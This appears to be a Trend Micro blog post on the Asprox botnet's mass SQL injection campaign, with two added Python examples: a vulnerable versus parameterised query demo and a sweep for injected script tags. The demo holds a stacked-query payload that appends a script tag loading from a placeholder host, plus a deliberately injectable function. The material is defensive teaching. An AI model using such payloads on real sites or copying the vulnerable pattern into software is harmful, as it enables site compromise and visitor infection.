    Trend Micro TrendLabs Malware Blog

    YAMSIA (Yet Another Massive SQL Injection Attack)

    Clever mnemonics aside, last week we saw another large-scale SQL injection attack (or YAMSIA, if you prefer), this time orchestrated by a botnet that has become known as Asprox. But first, a history lesson.

    The code behind the Asprox botnet seems to have been around for quite some time, but it was only in the last year that it was upgraded into a botnet whose main job is to send phishing emails. That changed in late May / early June of this year, when the bots were issued a new set of commands: start searching the Web for certain .ASP pages, then launch an SQL injection attack against each of them (hmm ... I wonder where they got that idea from).


    Figure 1. The modus operandi that has become more and more common.
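    The pattern the bots were hunting for, modelled in Python against SQLite as an added example (this is not code from the post or from Trend Micro): a page that pastes a query-string value straight into its SQL, beside the parameterised version. The products table, the sample rows, the stacked-query payload and the host bad.example are constructed for the demonstration; the use of executescript() stands in for a driver that accepts several statements in one string, which is assumed here to be what allowed a single injected request to rewrite a whole table.

```python
"""Vulnerable versus hardened lookup for a mass SQL injection (added example)."""
import sqlite3

# Constructed placeholder for the tag the bots appended to stored content.
INJECTED_TAG = '<script src="http://bad.example/ngg.js"></script>'


def make_db():
    """In-memory stand-in for a shop's database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, "
        "description TEXT, hits INTEGER DEFAULT 0)"
    )
    conn.executemany(
        "INSERT INTO products (name, description) VALUES (?, ?)",
        [("Widget", "A fine widget."),
         ("Gadget", "An even finer gadget."),
         ("Gizmo", "Batteries not included.")],
    )
    conn.commit()
    return conn


def count_hit_vulnerable(conn, product_id):
    """The anti-pattern: the raw request value becomes part of the SQL text.

    sqlite3's execute() refuses more than one statement per call, so
    executescript() is used to emulate a driver that runs stacked statements
    (assumption: the attacked sites' database stack behaved that way).
    """
    sql = "UPDATE products SET hits = hits + 1 WHERE id = " + product_id + ";"
    conn.executescript(sql)
    conn.commit()


def count_hit_hardened(conn, product_id):
    """Same feature, done safely: validate the type, then bind as a parameter
    so the database never interprets the value as SQL."""
    try:
        pid = int(product_id)
    except ValueError:
        raise ValueError("product id must be an integer") from None
    conn.execute("UPDATE products SET hits = hits + 1 WHERE id = ?", (pid,))
    conn.commit()


def injected_rows(conn):
    """Rows whose description now carries a script tag (the infection footprint)."""
    return conn.execute(
        "SELECT COUNT(*) FROM products WHERE description LIKE '%<script%'"
    ).fetchone()[0]


def hits(conn, product_id):
    """Current hit counter for one product."""
    return conn.execute(
        "SELECT hits FROM products WHERE id = ?", (product_id,)
    ).fetchone()[0]


# Constructed request value: a valid id followed by a statement that appends
# the tag to every description in the table (SQLite string concatenation).
PAYLOAD = "1; UPDATE products SET description = description || '" + INJECTED_TAG + "'"


def demo():
    """Run the payload through both versions and report what each did."""
    vuln = make_db()
    count_hit_vulnerable(vuln, PAYLOAD)  # the appended UPDATE poisons every row
    safe = make_db()
    try:
        count_hit_hardened(safe, PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    count_hit_hardened(safe, "1")  # a normal request still works
    return injected_rows(vuln), injected_rows(safe), rejected, hits(safe, 1)


if __name__ == "__main__":
    print(demo())
```

    With the payload, the vulnerable path leaves all three descriptions carrying the tag, while the hardened path rejects the request outright and, for a normal id, updates exactly one counter. Rejecting non-integers is a bonus; the parameter binding alone is what stops the injected statement from running.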

    Compromised sites have a piece of JavaScript (JS) embedded in them (the SQL injection writes it into database content that the sites' pages render), which in turn points to another JS file on a separate domain (this first technique was taught in Bouncing Malware 101). These domains are part of a fast-flux network hosted on the botnet itself, a technique widely used by another well-known botnet, Storm. The JS file name was originally b.js, but this has since changed and, in the latest wave, it is the highly imaginative ngg.js.


    Figure 2. Sample of malicious script (with some parts removed)

    As the figure shows, the script creates a cookie that expires after 9 days. This serves as an infection marker for the page (the usual purpose of such a marker is to bounce each visitor only once, so a reloaded page, or an analyst's second fetch, does not show the iframe again), and the script then "bounces" the visitor once more, to the page pointed to by the iframe.

    Depending on the country you are browsing from, the Asprox botnet may decide not to let you reach this page, in which case you are redirected to the legitimate www.msn.com (worth remembering when reproducing the chain from a lab: a fetch from a filtered country sees only the benign redirect). If you are "lucky" enough to be allowed through, your browser is promptly slapped in the face with a barrage of exploits for browser vulnerabilities, all with the goal of having your computer join in the fun by hooking it up to the botnet.

    Attacks of this kind can be very effective because they are normally completely hidden from the Internet user: the injected script and everything it pulls in are loaded quietly in the background, with nothing visible on the page. We were sure this was a criminal act, and as such have added detection for the threat, as well as for the bouncing JavaScript itself (JS_IFRAME.ADN).
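    What a site owner needs after such a wave is a sweep for the footprint it leaves. The following is an added example, not the post's or Trend Micro's code: it walks every text column of a SQLite database (the hit sites ran SQL Server, where the same walk goes over INFORMATION_SCHEMA.COLUMNS) and any captured page, and reports script tags that load from hosts outside an allow-list. The tables, rows, sample page, the allow-list and the host bad.example are all constructed; identifier quoting assumes table and column names without embedded double quotes.

```python
"""Sweep stored content and served pages for injected foreign script tags."""
import re
import sqlite3
from urllib.parse import urlparse

# Matches <script ... src=VALUE with or without quotes around VALUE.
SCRIPT_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.IGNORECASE)


def script_hosts(text):
    """Hosts referenced by <script src=...> tags; relative URLs yield ''."""
    return [urlparse(src).hostname or "" for src in SCRIPT_SRC.findall(text)]


def foreign_scripts(text, trusted_hosts):
    """Script hosts that are neither relative nor on the allow-list."""
    return [h for h in script_hosts(text) if h and h.lower() not in trusted_hosts]


def text_columns(conn):
    """(table, column) pairs whose declared type is text-like, from the catalog."""
    out = []
    for (table,) in conn.execute("SELECT name FROM sqlite_master WHERE type = 'table'"):
        for _cid, col, decl, *_rest in conn.execute(f'PRAGMA table_info("{table}")'):
            if any(k in (decl or "").upper() for k in ("CHAR", "TEXT", "CLOB")):
                out.append((table, col))
    return out


def sweep_database(conn, trusted_hosts):
    """Return (table, column, rowid, host) for every stored value that carries
    a script tag loading from a foreign host."""
    findings = []
    for table, col in text_columns(conn):
        rows = conn.execute(
            f'SELECT rowid, "{col}" FROM "{table}" WHERE "{col}" LIKE ? ORDER BY rowid',
            ("%<script%",),
        )
        for rowid, value in rows:
            for host in foreign_scripts(value or "", trusted_hosts):
                findings.append((table, col, rowid, host))
    return findings


def sample_db():
    """Constructed database: one poisoned product, one poisoned news item."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name VARCHAR(50),
                               description TEXT, price REAL);
        CREATE TABLE news (id INTEGER PRIMARY KEY, body TEXT);
        INSERT INTO products VALUES (1, 'Widget',
            'A fine widget.<script src="http://bad.example/ngg.js"></script>', 9.5);
        INSERT INTO products VALUES (2, 'Gadget', 'Plain text.', 12.0);
        INSERT INTO news VALUES (1, 'Site news.<script src="/js/site.js"></script>');
        INSERT INTO news VALUES (2, '<script src=http://bad.example/b.js></script>');
    """)
    return conn


# Constructed captured page: two legitimate scripts and one appended after </html>,
# which is where field-data injection tends to land when a template renders it.
SAMPLE_PAGE = """<html><head><script src="/js/site.js"></script>
<script src="http://www.shop.example/js/cart.js"></script></head>
<body>Catalogue</body></html>
<script src="http://bad.example/ngg.js"></script>"""

TRUSTED = {"www.shop.example"}

if __name__ == "__main__":
    for table, col, rowid, host in sweep_database(sample_db(), TRUSTED):
        print(f"DB   {table}.{col} rowid={rowid} -> {host}")
    for host in foreign_scripts(SAMPLE_PAGE, TRUSTED):
        print(f"PAGE -> {host}")
```

    Keying on the host rather than on a particular file name matters here, since the post itself notes the file name changed from b.js to ngg.js between waves; the allow-list is the part that has to be maintained per site.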

    Unfortunately, security is still a major issue for the majority of Web sites, and until it becomes one of the core design goals from the start of a Web site project, expect to see more YAMSIA blog posts in the future (can you tell I'm trying to get this mnemonic to stick?).










    © Copyright 2011 Trend Micro Inc. All rights reserved. Legal Notice